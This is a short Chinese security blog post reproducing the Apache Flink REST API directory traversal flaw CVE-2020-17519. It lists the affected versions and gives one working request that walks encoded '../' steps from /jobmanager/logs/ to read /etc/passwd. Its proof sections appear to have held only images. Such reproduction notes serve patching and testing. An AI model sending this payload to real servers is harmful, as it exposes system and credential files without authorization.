Nday实战Apache Flink 目录遍历漏洞 CVE-2020-17519

admin 2021年9月8日10:42:04评论55 views字数 704阅读2分20秒阅读模式
欢迎关注公众号:24h进德修业。一名普通的白帽子,维护着一个既讲技术又有温度的原创号,一如既往地学习和分享,希望大家在紧张而忙碌的生活中可以在这里安静的学习,前行的道路上感谢有您的关注与支持。
漏洞描述:
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞,目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519,漏洞等级:高危,漏洞评分:8.5。
远程攻击者通过REST API目录遍历,可造成文件读取/写入的影响。
漏洞影响:
Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2
漏洞复现:
漏洞url:
http://x.x.x.x/
网站首页:
Nday实战Apache Flink 目录遍历漏洞 CVE-2020-17519
构造payload:
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
漏洞证明:
Nday实战Apache Flink 目录遍历漏洞 CVE-2020-17519
漏洞利用POC:
Nday实战Apache Flink 目录遍历漏洞 CVE-2020-17519

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:24h进德修业拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

本文始发于微信公众号(24h进德修业):Nday实战Apache Flink 目录遍历漏洞 CVE-2020-17519

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月8日10:42:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nday实战Apache Flink 目录遍历漏洞 CVE-2020-17519https://cn-sec.com/archives/362947.html

发表评论

匿名网友 填写信息